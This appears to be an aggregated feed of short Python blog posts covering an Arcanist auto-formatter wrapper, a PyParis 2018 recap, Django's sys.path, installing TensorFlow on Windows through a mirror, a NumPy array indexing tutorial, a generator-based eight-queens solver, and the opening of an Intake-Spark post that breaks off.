Automatic Python Linters and Formatters for Arcanist

December 7, 2018, 8:48 am


Linting matters when you work in a team: once everyone follows the same conventions, code written by others becomes familiar and easier to understand. Your team will probably be divided on a long list of details (tabs or spaces, for one), but it is important to settle on something that works for everyone and converge on a single style quickly.

We use Phabricator for our code review process, and it supports linting at the time a review is submitted. Arcanist has a lot of built-in linters based on pep8, flake8 and similar tools. These linters report the problems in the code, and on a big project you are likely to see hundreds of them the first time you run one.

I was convinced that we needed something unobtrusive that fixes lint problems automatically instead of only telling us what they are. Such formatters can’t apply everything PEP 8 recommends, but I find that they do a reasonably good job of keeping code clean and readable in a fast-paced environment.

I have written a small wrapper around the following auto code-formatters for Arcanist to bring some consistency in our development process. You can find the repository here: Arcanist python Lint Autoformat .

Included formatters

↧

PyParis 2018

December 7, 2018, 8:46 am


At Sqreen we try to attend any conference related to our tech stack: to learn and interact and, sometimes, to present. This year at PyParis 2018 we did all of those things. It was a well-organized event with two main tracks: one for data science and one for regular Python development (called “web/core”). Most people, regardless of their main track, could find something relevant and interesting.

The conference kicked off with a keynote by Nina from Microsoft: a Python developer evangelist for Azure, who had recently flown in from Portland and whose internal clock was still tuned to the middle of the night. But that didn’t stop her from delivering an energetic and fun presentation about technical debt!

Technical Debt: the Code Monster in your Closet by Nina Zakharenko ( slides , video )

After the keynote, the conference split into the tracks.

Sqreen’s own CTO Jean-Baptiste Aviat did a presentation at the conference, called Scaling from 0 to 60k RPM (requests-per-minute) ( slides , video ).

It was a fast-paced retrospective on how Sqreen has dealt with scaling issues from way back when our APIs had 0 RPM, up to now when we have about 60 000 RPM. It was an accessible presentation even if you don’t have a lot of experience in Python, or scaling for that matter.

The conference’s data science track was pretty good. Our senior data scientist Bartosz comments:

In general terms, I found the conference interesting. Especially, the merge between the data and web communities was a very good idea, but unfortunately these two tracks were 5 floors apart, so changing between them was not an easy exercise. I attended mainly the data track: there were many interesting talks, but I wish some of them explored the technical aspects in more depth.

Overall, the data track was well balanced, so that the talks were accessible to people without a data science background, while still remaining interesting to seasoned data scientists.

Our highlights from a data science perspective were:

Array computing in Python by Wolf Vollprecht ( slides , video )
The speaker from QuantStack did a very good job of giving a chronological account of the “vectorised” array computation capabilities in Python (for those who don’t know, arrays allow computations to be run on all array items in parallel). We also learned about a few interesting libraries to look into (xnd, Pythran, generic code in NumPy NEP18).

Interactive widgets in the Jupyter Notebook by Martin Renou ( slides , video )
Another QuantStack employee reviewed the interactive widgets that can be embedded into Jupyter notebooks. There were some impressive examples, like a cartographic map with embedded graphs.

Deep learning of hotel images by Christopher Lennan & Tanuj Jain ( slides , video )
Not surprisingly there were quite a few talks about deep learning. We especially enjoyed this one. The speakers (Idealo’s data science team) presented an automatic quality check of hotel images that was used in production at Idealo.

Understanding and diagnosing your machine-learning models by Gael Varoquaux ( materials )
This was a gem of a session. It wasn’t part of the main data or core tracks, but rather the smaller hands-on tutorial track. It covered advanced methods for debugging machine-learning models, and was presented by one of the scikit-learn creators.

Beyond the talks, the atmosphere was great too: in between the presentations, we met a lot of smart people to chat with. Our backend team lead Benoît writes:

I mostly attended the Python track. The atmosphere was very nice. It was packed, because the conference took place in a school. There were plenty of nice people to chat with during the breaks/lunch. Many people seem to be working on, or were very interested in security.

Benoît’s highlights for the conference from both tracks:

Crossing the native code frontier by Serge sans Paille ( slides , video )
An in-depth look at the internals of CPython, exploring how we can make computations much faster.

Vim Your Python, Python Your Vim by Miroslav Šedivý ( slides , video )
Awesome talk about getting the most power out of your keyboard and vim setup. The subject could seem like a solved issue. It’s not, and the delivery of the talk was top-notch!

Deep learning of hotel images by

↧

Django: What is `sys.path` supposed to be ...

December 7, 2018, 8:44 am


When developing a Django application, what is sys.path supposed to contain? The directory which contains the project, or the directory of the project, or both?

sys.path should and will have the directory of the project. Depending on what your setup is, it may also contain the directory which contains the project.

However, if the motivation behind this question is to ensure that certain files can be found, then you should note that sys.path is just like a normal list and can be appended to. Therefore, you can add a new location to sys.path like so:

sys.path.append('/home/USER/some/directory/')

where your files can be found.
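As a minimal sketch of the advice above, the helper below appends a directory to sys.path only if it is not already there. The function name add_to_sys_path and the directory "some/directory" are placeholders chosen for illustration, not part of Django or of the original answer.

```python
import sys
from pathlib import Path


def add_to_sys_path(directory):
    """Append `directory` to sys.path once and return the resolved path string."""
    resolved = str(Path(directory).resolve())
    if resolved not in sys.path:
        sys.path.append(resolved)
    return resolved


# Hypothetical location; replace it with the directory that holds your modules.
extra = add_to_sys_path("some/directory")
print(extra in sys.path)
```

Resolving the path first avoids adding the same directory twice under different spellings. Printing sys.path from inside manage.py shell is a quick way to see what your own setup actually contains.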

Hope this helps

↧

TensorFlow installation process

December 7, 2018, 8:42 am


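Editor's recommendation:

This article comes from CSDN. It walks through the steps of installing TensorFlow on Windows in detail; we hope it helps with your studies.

1. Preface: this TensorFlow installation is based on Python. Installing Python itself is not covered (if you have decided to install TensorFlow, you should already know some Python). This tutorial covers installing TensorFlow through Anaconda on Windows (the CPU build, because my graphics card does not support the GPU build...).

2. Environment (TensorFlow supports 64-bit systems only; Windows, Linux and macOS all need to be 64-bit):

Windows 7 (the Windows version does not really matter; mine is Windows 7, and I followed a Windows 10 walkthrough while installing)

Python 3.5.2 (this is the version that was already on my machine; if you have Python installed but do not know the version, type "python --version" in a command window to display it)

Anaconda3-4.2.0-Windows-x86_64.exe (on Windows, just make sure you pick the Windows x86 64-bit installer)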

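3. Anaconda3-4.2.0-Windows-x86_64.exe

You can download it from the official site; just search for the version that matches your machine. I usually download from a mirror in China because it is faster (the Tsinghua mirror is at https://mirrors.tuna.tsinghua.edu.cn/anaconda/archive/).

Once the download finishes, run the installer. The steps are:

For personal use, choose Just Me

Choose the drive you prefer to install to

Tick both options on the next screen and click Install

To verify that Anaconda installed correctly:

Type "conda --version" in a command window; you should get conda 4.2.0

If you see this result, congratulations: Anaconda is installed. Let's continue.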

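4. Installing TensorFlow

Installing TensorFlow downloads packages from the Anaconda repository. The default channels point to servers abroad, so downloads are slow. I use the Tsinghua mirror, which means changing the channel address. Open the Anaconda Prompt that was installed with Anaconda and enter:

conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/free/

conda config --set show_channel_urls yes

These two commands switch conda to the Tsinghua mirror.

Next, create an environment for TensorFlow. In the Anaconda Prompt, enter:

conda create -n tensorflow python=3.5.2

The installation proceeds as described below; the pitfalls I ran into are written up at the end.

Normally it goes like this:

Wait, then enter "y"

Then:

When the output suggests "activate tensorflow", the environment named tensorflow has been created. Activate it by entering "activate tensorflow".

We want the CPU build, so next enter at the same prompt:

pip install -i https://pypi.tuna.tsinghua.edu.cn/simple/ https://mirrors.tuna.tsinghua.edu.cn/tensorflow/windows/cpu/tensorflow-1.1.0-cp35-cp35m-win_amd64.whl

You can also choose a different TensorFlow version; the available ones are listed on the Tsinghua mirror.

After a short wait, when the last line of output reports success, congratulations: the installation is done. Now let's test it.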

5. Testing:

In the Anaconda Prompt window, enter: python

Once inside Python, enter:

import tensorflow as tf

sess = tf.Session()

a = tf.constant(10)

b = tf.constant(12)

sess.run(a+b)

That's it: you can now use TensorFlow with confidence.

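6. Pitfalls along the way:

Finally, let's deal with the pitfalls.

Error when switching to the Tsinghua mirror: conda reports a path error. Run conda info and you will find:

The channel address is clearly garbled. To fix it, find the .condarc file in C:\Users\Administrator, open it, and correct the address.

Then go back to the command window and continue the installation.

If you see the following while installing TensorFlow:

Lots of red text, but don't worry. Read the last paragraph: it says the problem is a version issue, so upgrading fixes it.

The operation is as follows:

Result:

Problem solved.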

↧

NumPy basics: multidimensional arrays

December 7, 2018, 8:40 am


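Editor's recommendation: this article comes from CSDN. Its main point is that fancy indexing and boolean indexing copy data, while the other operations return views of the source data.

NumPy (short for Numerical Python) is the foundational package for high-performance scientific computing and data analysis. Some of its features:

1. ndarray, a fast, space-efficient multidimensional array with vectorized arithmetic and sophisticated broadcasting.

2. Standard mathematical functions for fast operations on whole arrays of data (no loops required).

3. Tools for reading and writing array data on disk and for working with memory-mapped files.

4. Linear algebra, random number generation and Fourier transform capabilities.

5. Tools for integrating code written in C, C++, Fortran and other languages.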

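Creating an ndarray

The easiest way to create an array is the array function. It accepts any sequence-like object (including other arrays) and produces a new NumPy array containing the data passed in.

Converting a list:

import numpy as np

data1 = [6,7.5,8,0,1]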

arr1 = np.array(data1)

# array([ 6. , 7.5, 8. , 0. , 1. ])

Nested sequences (such as a list of equal-length lists) are converted into a multidimensional array:

data2 = [[1,2,3,4],[5,6,7,8]]

arr2 = np.array(data2)

# array([[1, 2, 3, 4], # [5, 6, 7, 8]])

data2 is a list of lists, so arr2 has two dimensions. We can confirm this with the ndim and shape attributes:

arr2.ndim

# 2

arr2.shape

# (2,4)

Unless told otherwise, np.array picks a suitable type for the data and stores it in dtype:

arr1.dtype

# dtype('float64')

arr2.dtype

# dtype('int64')

Besides np.array, several other functions create arrays, such as zeros and ones. The shape can also be given as a tuple:

np.zeros(10)

# array([ 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.])

np.zeros((3,6))

# array([[ 0., 0., 0., 0., 0., 0.], # [ 0., 0., 0., 0., 0., 0.], # [ 0., 0., 0., 0., 0., 0.]])

np.empty((2,3,2))

# array([[[ 0.00000000e+000, 0.00000000e+000], # [ 2.16538378e-314, 2.16514681e-314], # [ 2.16511832e-314, 2.16072529e-314]], # [[ 0.00000000e+000, 0.00000000e+000], # [ 2.14037397e-314, 6.36598737e-311], # [ 0.00000000e+000, 0.00000000e+000]]])

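np.empty does not guarantee an array of all zeros; in some cases it returns uninitialized garbage values, as above.

arange is an array-valued version of Python's range function: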

np.arange(15)

# array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14])

Some array-creation functions:

Data types for ndarrays

dtype holds the type of the data:

arr1 = np.array([1, 2, 3], dtype=np.float64)

arr2 = np.array([1, 2, 3], dtype=np.int32)

arr1.dtype

# dtype('float64')

arr2.dtype

# dtype('int32')

dtypes are what let NumPy work flexibly with data coming from other systems.

You can convert between types with astype:

arr = np.array([1, 2, 3, 4, 5])

arr.dtype

# dtype('int64')

float_arr = arr.astype(np.float64)

float_arr.dtype

# dtype('float64')

The above converts int to float. When converting float to int, the fractional part is discarded:

arr = np.array([3.7, -1.2, -2.6, 0.5, 12.9, 10.1])

arr

# array([ 3.7, -1.2, -2.6, 0.5, 12.9, 10.1])

arr.astype(np.int32)

# array([ 3, -1, -2, 0, 12, 10], dtype=int32)

astype can also turn strings that represent numbers into actual numbers:

numeric_strings = np.array(['1.25', '-9.6', '42'], dtype=np.string_)

numeric_strings

# array([b'1.25', b'-9.6', b'42'],

# dtype='|S4')

numeric_strings.astype(float)

# array([ 1.25, -9.6 , 42. ])

Be careful with the numpy.string_ type: its length is fixed, so it may silently truncate input without a warning.

If the conversion (cast) fails, a ValueError is raised.
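The two behaviours described above (truncation when casting float to int, and a ValueError when a cast fails) can be checked with a short sketch. The variable names and sample values are illustrative only.

```python
import numpy as np

floats = np.array([3.7, -1.2, -2.6, 0.5])
ints = floats.astype(np.int32)           # fractional parts are dropped, not rounded

numeric_strings = np.array(['1.25', '-9.6', '42'])
parsed = numeric_strings.astype(float)   # strings that look like numbers parse cleanly

try:
    np.array(['1.25', 'not a number']).astype(float)
    cast_failed = False
except ValueError:
    # NumPy cannot interpret 'not a number' as a float
    cast_failed = True

print(ints, parsed, cast_failed)
```

Because astype returns a new array, floats itself is left unchanged by the conversion.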

You can also specify the type by passing another array's dtype directly:

int_array = np.arange(10)

calibers = np.array([.22, .270, .357, .380, .44, .50], dtype=np.float64)

int_array.astype(calibers.dtype)

# array([ 0., 1., 2., 3., 4., 5., 6., 7., 8., 9.])

You can also use shorthand type codes; for example, u4 stands for uint32:

empty_uint32 = np.empty(8, dtype='u4')

empty_uint32

# array([0, 0, 0, 0, 0, 0, 0, 0], dtype=uint32)

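astype always returns a new array.

Operations between arrays and scalars

Arrays matter because they let you express batch operations on data without writing loops. This is called vectorization. Any arithmetic operation between equal-size arrays applies the operation element-wise: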

arr = np.array([[1., 2., 3.], [4., 5., 6.]])

arr

# array([[ 1., 2., 3.], # [ 4., 5., 6.]])

arr * arr

# array([[ 1., 4., 9.], # [ 16., 25., 36.]])

arr - arr

# array([[ 0., 0., 0.], # [ 0., 0., 0.]])

Arithmetic operations between an array and a scalar propagate the scalar to every element:

1 / arr

# array([[ 1. , 0.5 , 0.33333333], # [ 0.25 , 0.2 , 0.16666667]])

arr ** 0.5

# array([[ 1. , 1.41421356, 1.73205081], # [ 2. , 2.23606798, 2.44948974]])

Operations between arrays of different sizes are called broadcasting.
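As a small illustration of broadcasting between arrays of different shapes, the sketch below adds a row vector and a column vector to a 2 x 3 array. The arrays row and col are made-up examples, not taken from the article.

```python
import numpy as np

arr = np.array([[1., 2., 3.], [4., 5., 6.]])   # shape (2, 3)
row = np.array([10., 20., 30.])                # shape (3,): stretched across both rows
col = np.array([[100.], [200.]])               # shape (2, 1): stretched across all columns

by_row = arr + row
by_col = arr + col

print(by_row)
print(by_col)
```

NumPy compares shapes from the trailing dimension backwards, and two dimensions are compatible when they are equal or when one of them is 1.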

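Basic indexing and slicing

NumPy array indexing offers many ways to select a subset of the data or a single element. One-dimensional arrays behave much like Python lists: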

arr = np.arange(10)

arr

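# array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])

arr[5]

# 5

arr[5:8]

# array([5, 6, 7])

arr[5:8] = 12

arr

# array([ 0, 1, 2, 3, 4, 12, 12, 12, 8, 9])

When you assign a scalar to a slice (as in arr[5:8] = 12), the value is propagated ("broadcast") to the entire selection. Unlike Python lists, array slices are views on the original array. This means the data is not copied, and any modification to the view is reflected in the source array.

arr_slice = arr[5:8]

arr_slice

# array([12, 12, 12])

arr_slice[1] = 12345

arr

# array([ 0, 1, 2, 3, 4, 12, 12345, 12, 8, 9])

arr_slice[:] = 64

arr

# array([ 0, 1, 2, 3, 4, 64, 64, 64, 8, 9])

If you want a copy of an ndarray slice rather than a view, you need to copy it explicitly, for example arr[5:8].copy().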

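In a two-dimensional array, the element at each index is no longer a scalar but a one-dimensional array:

arr2d = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])

arr2d[2]

# array([7, 8, 9])

There are two ways to access a single element: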

arr2d[0][2]

# 3

arr2d[0, 2]

# 3

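Indexing a two-dimensional array:

For multidimensional arrays, if you omit the later indices, the result is a lower-dimensional array. For example, take a 2 x 2 x 3 array: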

arr3d = np.array([[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])

arr3d

# array([[[ 1, 2, 3], # [ 4, 5, 6]], # [[ 7, 8, 9], # [10, 11, 12]]])

arr3d[0] is a 2 x 3 array:

arr3d[0]

# array([[1, 2, 3], # [4, 5, 6]])

Both scalars and arrays can be assigned to arr3d[0]:

old_values = arr3d[0].copy()

arr3d[0] = 42

arr3d

# array([[[42, 42, 42], # [42, 42, 42]], # [[ 7, 8, 9], # [10, 11, 12]]])

arr3d[0] = old_values

arr3d

# array([[[ 1, 2, 3], # [ 4, 5, 6]], # [[ 7, 8, 9], # [10, 11, 12]]])

arr3d[1, 0] returns all the values whose indices start with (1, 0), as a one-dimensional array:

arr3d[1, 0]

# array([7, 8, 9])

Note that every subset selection in the examples above returns a view (not a copy, but the original data itself).
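One way to check the view-versus-copy distinction is np.shares_memory, which reports whether two arrays overlap in memory. The sketch below is a minimal illustration with made-up variable names.

```python
import numpy as np

arr = np.arange(10)
view = arr[5:8]            # basic slicing: a view on arr's data
copy = arr[5:8].copy()     # explicit copy: independent data

view[:] = 64               # writes through to arr
copy[:] = -1               # leaves arr untouched

print(arr)
print(np.shares_memory(arr, view), np.shares_memory(arr, copy))
```

Only the write through view shows up in arr; the write through copy does not.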

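Slice indexing

The slicing syntax of ndarrays is much like that of one-dimensional objects such as Python lists.

Higher-dimensional objects can be sliced along one or more axes, and slices can be mixed with integer indices.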

arr2d

# array([[1, 2, 3], # [4, 5, 6], # [7, 8, 9]])

arr2d[:2]

# array([[1, 2, 3], # [4, 5, 6]])

As you can see, the slice runs along axis 0 (the rows). You can pass several slices at once, just as you can pass several indices:

arr2d[:2, 1:] # array([[2, 3], # [5, 6]])

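Slicing like this always yields array views with the same number of dimensions. Mixing integer indices with slices gives lower-dimensional slices: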

arr2d[1, :2] # array([4, 5])

Note that a colon by itself selects the entire axis, for example:

arr2d[:, :1] # array([[1], # [4], # [7]])

Assigning to a slice expression also assigns to the whole selection:

arr2d[:2, 1:] = 0

arr2d

# array([[1, 0, 0], # [4, 0, 0], # [7, 8, 9]])

Boolean indexing

Suppose we have an array holding data and an array of names (with duplicates). For example:

names = np.array(['Bob', 'Joe', 'Will', 'Bob', 'Will', 'Joe', 'Joe'])

names

# array(['Bob', 'Joe', 'Will', 'Bob', 'Will', 'Joe', 'Joe'],

# dtype='<U4')

data = np.random.randn(7, 4)

data

# array([[ 0.06226591, -0.27507719, 0.39229467, 1.0592541 ], # [ 0.29856009, -0.287806 , -1.06875432, -0.33292789], # [-0.48500348, -0.10072345, -1.76972263, -0.27355081], # [ 0.23004649, -0.76163183, 0.24673954, -0.47700137], # [ 1.54353606, -0.17964118, -0.7093982 , -1.55488714], # [ 0.17778785, 1.25049472, 1.92926838, 0.49794146], # [ 0.11571349, -1.28075539, -1.15407468, 0.86778147]])

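Suppose each name corresponds to one row of the data array, and we want to select all rows that correspond to the name 'Bob'. Like arithmetic, array comparisons (such as ==) are vectorized. So comparing names with the string 'Bob' produces a boolean array: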

names == 'Bob'

# array([ True, False, False, True, False, False, False], dtype=bool)

A boolean array can be used to index an array:

data[names == 'Bob'] # array([[ 0.02584271, -1.53529621, 0.73143988, -0.34086189], # [-0.48632936, 0.63817756, -0.40792716, -1.48037389]])

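The boolean array must have the same length as the axis it indexes. You can also mix boolean arrays with slices or integers (or sequences of integers):

data[names == 'Bob', 2:]

# array([[ 0.73143988, -0.34086189], # [-0.40792716, -1.48037389]])

data[names == 'Bob', 3]

# array([-0.34086189, -1.48037389])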

To select every row except the 'Bob' rows, use != or negate the condition with ~:

names != 'Bob'

# array([False, True, True, False, True, True, True], dtype=bool)

data[~(names == 'Bob')]

# array([[ 0.40864782, 0.53476799, 1.09620596, 0.4846564 ], # [ 1.95024076, -0.37291038, -0.40424703, 0.30297059], # [-0.81976335, -1.10162466, -0.59823212, -0.10926744], # [-0.5212113 , 0.29449179, 2.0568032 , 2.00515735], # [-2.36066876, -0.3294302 , -0.24464646, -0.81432884]])

Selecting two of the three names requires combining several boolean conditions with boolean operators such as & (and) and | (or).

names

# array(['Bob', 'Joe', 'Will', 'Bob', 'Will', 'Joe', 'Joe'],

# dtype='<U4')

mask = (names == 'Bob') | (names == 'Will')

mask

# array([ True, False, True, True, True, False, False], dtype=bool)

data[mask]

# array([[ 0.02584271, -1.53529621, 0.73143988, -0.34086189], # [ 1.95024076, -0.37291038, -0.40424703, 0.30297059], # [-0.48632936, 0.63817756, -0.40792716, -1.48037389], # [-0.81976335, -1.10162466, -0.59823212, -0.10926744]])

Selecting data with boolean indexing always creates a copy of the data, even if the returned array is identical to the original.
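The copy behaviour is easy to confuse with boolean assignment, which does modify the original array in place. The sketch below contrasts the two, using small made-up arrays instead of the random data above.

```python
import numpy as np

names = np.array(['Bob', 'Joe', 'Will', 'Bob'])
data = np.arange(1., 9.).reshape(4, 2)     # rows: [1, 2], [3, 4], [5, 6], [7, 8]

selected = data[names == 'Bob']            # boolean selection returns a copy
selected[:] = -1                           # modifies the copy only
untouched = data.copy()                    # snapshot: data still holds the original values

data[names == 'Bob'] = 0                   # boolean assignment writes into data itself

print(untouched)
print(data)
```

Indexing on the right-hand side of an assignment produces a new array, while indexing on the left-hand side writes into the existing one.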

Setting values through boolean arrays is a common technique. To set all negative values in data to 0, you only need:

data[data < 0] = 0

data

# array([[ 0.02584271, 0. , 0.73143988, 0. ], # [ 0.40864782, 0.53476799, 1.09620596, 0.4846564 ], # [ 1.95024076, 0. , 0. , 0.30297059], # [ 0. , 0.63817756, 0. , 0. ], # [ 0. , 0. , 0. , 0. ], # [ 0. , 0.29449179, 2.0568032 , 2.00515735], # [ 0. , 0. , 0. , 0. ]])

Setting whole rows or columns with a one-dimensional boolean array is just as easy:

data[names != 'Joe'] = 7

data

# array([[ 7. , 7. , 7. , 7. ], # [ 0.40864782, 0.53476799, 1.09620596, 0.4846564 ], # [ 7. , 7. , 7. , 7. ], # [ 7. , 7. , 7. , 7. ], # [ 7. , 7. , 7. , 7. ], # [ 0. , 0.29449179, 2.0568032 , 2.00515735], # [ 0. , 0. , 0. , 0. ]])

Fancy indexing

Fancy indexing is a NumPy term for indexing with integer arrays. Suppose we have an 8 x 4 array:

arr = np.empty((8, 4))

for i in range(8):
    arr[i] = i

arr

# array([[ 0., 0., 0., 0.], # [ 1., 1., 1., 1.], # [ 2., 2., 2., 2.], # [ 3., 3., 3., 3.], # [ 4., 4., 4., 4.], # [ 5., 5., 5., 5.], # [ 6., 6., 6., 6.], # [ 7., 7., 7., 7.]])

To select a subset of rows in a particular order, simply pass a list or ndarray of integers in that order:

arr[[4, 3, 0, 6]] # array([[ 4., 4., 4., 4.], # [ 3., 3., 3., 3.], # [ 0., 0., 0., 0.], # [ 6., 6., 6., 6.]])

Negative indices select rows from the end:

arr[[-3, -5, -7]] # array([[ 5., 5., 5., 5.], # [ 3., 3., 3., 3.], # [ 1., 1., 1., 1.]])

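Passing several index arrays at once behaves slightly differently: it returns a one-dimensional array whose elements correspond to each tuple of indices: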

arr = np.arange(32).reshape((8, 4))

arr

# array([[ 0, 1, 2, 3], # [ 4, 5, 6, 7], # [ 8, 9, 10, 11], # [12, 13, 14, 15], # [16, 17, 18, 19], # [20, 21, 22, 23], # [24, 25, 26, 27], # [28, 29, 30, 31]])

arr[[1, 5, 7, 2], [0, 3, 1, 2]]

# array([ 4, 23, 29, 10])

As you can see, [ 4, 23, 29, 10] corresponds to the elements at (1, 0), (5, 3), (7, 1) and (2, 2). When one index array is passed per axis like this, the result is always one-dimensional, however many dimensions the array has. To select a rectangular subset of the matrix's rows and columns instead, you can write:

arr[[1, 5, 7, 2]][:, [0, 3, 1, 2]]

# array([[ 4, 7, 5, 6], # [20, 23, 21, 22], # [28, 31, 29, 30], # [ 8, 11, 9, 10]])

This first selects the four rows [1, 5, 7, 2] from arr:

# array([[ 4, 5, 6, 7], # [20, 21, 22, 23], # [28, 29, 30, 31], # [ 8, 9, 10, 11]])

Then [:, [0, 3, 1, 2]] keeps all rows but reorders the columns as 0, 3, 1, 2, which gives:

# array([[ 4, 7, 5, 6], # [20, 23, 21, 22], # [28, 31, 29, 30], # [ 8, 11, 9, 10]])

Unlike slicing, fancy indexing always copies the data into a new array.
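The row-and-column selection can also be written in a single indexing step with np.ix_, which builds an open mesh from the two index lists. The sketch below compares it with the chained form and with element-wise pairing; the variable names are illustrative.

```python
import numpy as np

arr = np.arange(32).reshape((8, 4))
rows, cols = [1, 5, 7, 2], [0, 3, 1, 2]

pairs = arr[rows, cols]             # element-wise pairs: (1, 0), (5, 3), (7, 1), (2, 2)
chained = arr[rows][:, cols]        # two indexing steps, with an intermediate copy
block = arr[np.ix_(rows, cols)]     # one step: every row in rows crossed with every column in cols

print(pairs)
print(block)
```

Both block and chained are new arrays, so modifying them does not affect arr.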

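Transposing arrays and swapping axes

Transposing is a special form of reshaping that returns a view of the source data (no copying takes place). There are two ways to do it: the transpose method and the T attribute.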

arr = np.arange(15).reshape((3, 5))

arr

# array([[ 0, 1, 2, 3, 4], # [ 5, 6, 7, 8, 9], # [10, 11, 12, 13, 14]])

arr.T

# array([[ 0, 5, 10], # [ 1, 6, 11], # [ 2, 7, 12], # [ 3, 8, 13], # [ 4, 9, 14]])

This operation is often needed in matrix computations, for example when computing an inner product with np.dot:

arr = np.random.randn(6,3)

np.dot(arr.T,arr)

# array([[ 1.8717599 , -1.66444711, -0.65044072], # [-1.66444711, 6.02759713, 0.05453921], # [-0.65044072, 0.05453921, 3.65394036]])

For higher-dimensional arrays, transpose needs a tuple of axis numbers to permute the axes (this takes some mental effort):

arr = np.arange(16).reshape((2, 2, 4))

arr

# array([[[ 0, 1, 2, 3], # [ 4, 5, 6, 7]], # [[ 8, 9, 10, 11], # [12, 13, 14, 15]]])

arr.transpose((1, 0, 2))

# array([[[ 0, 1, 2, 3], # [ 8, 9, 10, 11]], # [[ 4, 5, 6, 7], # [12, 13, 14, 15]]])

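In other words, the original axes are reordered according to the tuple. Simple transposes can use .T. ndarray also has a swapaxes method, which takes a pair of axis numbers: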

arr

# array([[[ 0, 1, 2, 3], # [ 4, 5, 6, 7]], # [[ 8, 9, 10, 11], # [12, 13, 14, 15]]])

arr.swapaxes(1, 2)

# array([[[ 0, 4], # [ 1, 5], # [ 2, 6], # [ 3, 7]], # [[ 8, 12], # [ 9, 13], # [10, 14], # [11, 15]]])

swapaxes likewise returns a view of the data (no copying takes place).
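A quick way to confirm that transpose and swapaxes return views is to write through the result and look at the original array. The sketch below uses the same 2 x 2 x 4 array as above; the value 99 is arbitrary.

```python
import numpy as np

arr = np.arange(16).reshape((2, 2, 4))

moved = arr.transpose((1, 0, 2))    # reorder the axes: new axis 0 is old axis 1
swapped = arr.swapaxes(1, 2)        # exchange axes 1 and 2 only

print(moved.shape, swapped.shape)

swapped[0, 0, 0] = 99               # writing through the view changes arr as well
print(arr[0, 0, 0])
```

Element [i, j, k] of swapped is element [i, k, j] of arr, so the write lands on arr[0, 0, 0].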

↧

Talk less, code more: Learning Python 055: class members (an example application of generators)

December 7, 2018, 8:38 am


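Let's look at an interesting problem: the eight queens problem. The queen here is the chess queen. I only play Chinese chess, not international chess, but the problem does not depend on knowing how to play.

The eight queens problem: how can eight queens be placed on an 8×8 chessboard so that no queen can capture any other? To achieve this, no two queens may share a row, a column or a diagonal.

Before solving it, we introduce the idea of backtracking. Imagine walking through a maze without knowing the way ahead. We keep reaching forks with two options, and we keep choosing one until we hit a dead end; then we go back to the most recent fork and take the other option. Repeating this, we will in theory eventually get out of the maze.

We solve the eight queens problem the same way. First try to place the first queen, in the first row. Then place the second queen, and so on. If the next queen cannot be placed, backtrack to the previous step.

Now let's implement it in code.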

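First we define whether the next queen's position is legal. We use a sequence to record the position of the queen in each row. For example, state[0] = 2 means the queen in row 1 sits in column 3. The following function reports whether the position chosen for the next queen conflicts with the queens already placed.

def confict(state, nextX):
    nextY = len(state)
    for i in range(nextY):
        if abs(state[i] - nextX) in (0, nextY - i):
            return True
    return False

nextX is the horizontal position of the next queen (its x coordinate) and nextY is its vertical position (its y coordinate). The function checks the next queen against every queen already placed: if the two share the same horizontal position or lie on the same diagonal, the placement is illegal and the function returns True. If the check finds no problem, it returns False. It returns values this way because the function asks whether the placement conflicts: True means there really is a conflict, False means everything is fine.

The key expression is abs(state[i]-nextX) in (0, nextY-i). If the horizontal distance between the next queen and an earlier queen is 0 (same column), or equals their vertical distance nextY-i (same diagonal), there is a conflict.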

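Here is the key code:

def queens(num=8, state=()):
    for pos in range(num):
        if not confict(state, pos):
            if len(state) == num - 1:
                yield (pos,)
            else:
                for result in queens(num, state + (pos,)):
                    yield (pos,) + result

Backtracking problems are most conveniently implemented with recursion. The base case handles the last queen: every position that does not conflict is yielded directly. For all earlier queens, the else branch recurses to place the remaining queens and prepends the current position to each result. This is the hardest part to understand.

Think of it this way: once seven queens are placed and only the last one remains, there are two cases. Either the first seven positions leave legal positions for the last queen, or there is nowhere left to put it.

In the first case the problem is solved and we are done. In the second case we have to backtrack to the seventh queen, which must be moved to a different position.

It is called like this: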

print(len(list(queens(3))))

print(len(list(queens(4))))

print(len(list(queens(8))))

Output:

The eight queens problem has 92 solutions. Let's print one of them as a picture:

def prettyprint(s):
    def line(pos, length=len(s)):
        return '. ' * (pos) + 'X ' + '. ' * (length - pos - 1)
    for pos in s:
        print(line(pos))

import random
prettyprint(random.choice(list(queens(8))))

One of the 92 solutions looks like this:

. . . X . . . .
. X . . . . . .
. . . . . . X .
. . X . . . . .
. . . . . X . .
. . . . . . . X
X . . . . . . .
. . . . X . . .
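As an independent cross-check (not part of the original post), a solution can be validated without the recursive generator by confirming that all columns and both diagonal directions are distinct. The function name is_valid_solution is invented for this sketch, and board is the column of the X in each row of the board printed above.

```python
def is_valid_solution(state):
    """Return True if no two queens share a column or a diagonal.

    state[row] is the column of the queen in that row, so rows are
    distinct by construction.
    """
    n = len(state)
    columns = set(state)
    rising = {row + col for row, col in enumerate(state)}    # one diagonal direction
    falling = {row - col for row, col in enumerate(state)}   # the other diagonal direction
    return len(columns) == len(rising) == len(falling) == n


# Column of the X in each row of the printed board, top to bottom.
board = (3, 1, 6, 2, 5, 7, 0, 4)
print(is_valid_solution(board))
print(is_valid_solution((0, 1, 2, 3)))   # all queens on one diagonal
```

Two queens share a diagonal exactly when their row + col or their row - col values match, which is the same condition that the abs(...) test in the conflict function expresses pairwise.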

Project files download: https://download.csdn.net/download/yysyangyangyangshan/10833745

↧

Continuum Analytics Blog: Intake for Cataloging Spark

December 7, 2018, 12:36 pm


By: Martin Durant

Intake is an open source project for providing easy pythonic access to a wide variety of data formats, and a simple cataloging system for these data sources. Intake is a new project, and all are encouraged to try and comment on it.

pySpark is the python interface to Apache Spark, a fast and general purpose cluster computing system.

In this blog, we describe the new data driver for Intake, intake-spark , which allows data sources that are to be loaded via Spark to be described and enumerated in Intake catalogs alongside other data sources, files, and data services. In addition, some existing Intake drivers are acquiring methods to be loaded with Spark rather than python libraries.

This is part of a series of blog posts about Intake:

taking-the-pain-out-of-data-access
caching data on first read
parsing data from filenames

To run this code yourself, you first need to install requirements.

> conda install -c defaults -c intake intake intake-spark pyspark

New drivers

Intake-spark provides three new drivers for Intake:

spark_rdd
spark_dataframe
spark_cat

Let’s investigate the simplest case

In[1]:

import intake

We will perform a word count on a file in the current directory.

